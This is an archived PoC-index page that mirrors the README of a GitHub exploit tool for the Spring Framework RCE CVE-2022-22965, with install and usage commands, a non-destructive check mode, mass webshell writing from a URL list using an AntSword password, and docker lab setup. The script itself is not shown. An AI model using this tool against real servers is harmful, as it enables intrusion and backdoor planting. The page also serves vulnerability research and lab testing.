POC详情: ae164c917a749896234a8905d73277b10775f57d

来源
https://github.com/k3rwin/spring-core-rce
关联漏洞
标题: Spring Framework 代码注入漏洞 (CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
spring框架RCE漏洞 CVE-2022-22965
介绍
# Spring Core RCE/CVE-2022-22965

> 影响范围:JDK>=9 的spring框架及衍生框架
>
> [文章指路](https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html)
>
> **脚本仅供学习使用,如作他用所承受的法律责任一概与作者无关**

## 1.installation

~~~shell
pip3 install -r requirements.txt
~~~

## 2.Usage

```shell
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Spring framework Core 0day RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux
  -r FILE, --file FILE  指定url文件,批量写马
```

## 3.example

>无损探测
>
>-u,--url    或者使用-f,--file批量探测
>
>-c,--check,参数为自建http服务,可用`python3 -m http.server 80`快速搭建一个web服务器
>
>主要在内网且要求无损探测漏洞的情况下使用

```shell
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"
```

![image-20220422153433867](README.assets/image-20220422153433867.png)

>使用 -u指定url,-s指定操作系统  参数为:linux 或者 win,默认为linux

```shell
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"
```

![image-20220331203209702](README.assets/image-20220331203209702.png)

![image-20220331203858753](README.assets/image-20220331203858753.png)

> 使用 -r 批量写马 ,使用蚁剑连接,密码为k3rwin

~~~shell
python3 spring-core-rce.py -r "urls.txt"
~~~

![image-20220402112140568](README.assets/image-20220402112140568.png)

![image-20220402112349943](README.assets/image-20220402112349943.png)

## 4.Target

### ①.本地搭建docker靶场:

`docker pull vulfocus/spring-core-rce-2022-03-29:latest`

`docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29`

### ②.[在线靶场](http://vulfocus.io/#/dashboard)
文件快照

 [4.0K]  /data/pocs/ae164c917a749896234a8905d73277b10775f57d
├── [4.0K]  README.assets
│   ├── [104K]  image-20220331203209702.png
│   ├── [ 32K]  image-20220331203858753.png
│   ├── [105K]  image-20220402112140568.png
│   ├── [ 53K]  image-20220402112349943.png
│   └── [116K]  image-20220422153433867.png
├── [2.6K]  README.md
├── [  62]  requirements.txt
└── [ 13K]  spring-core-rce.py

1 directory, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。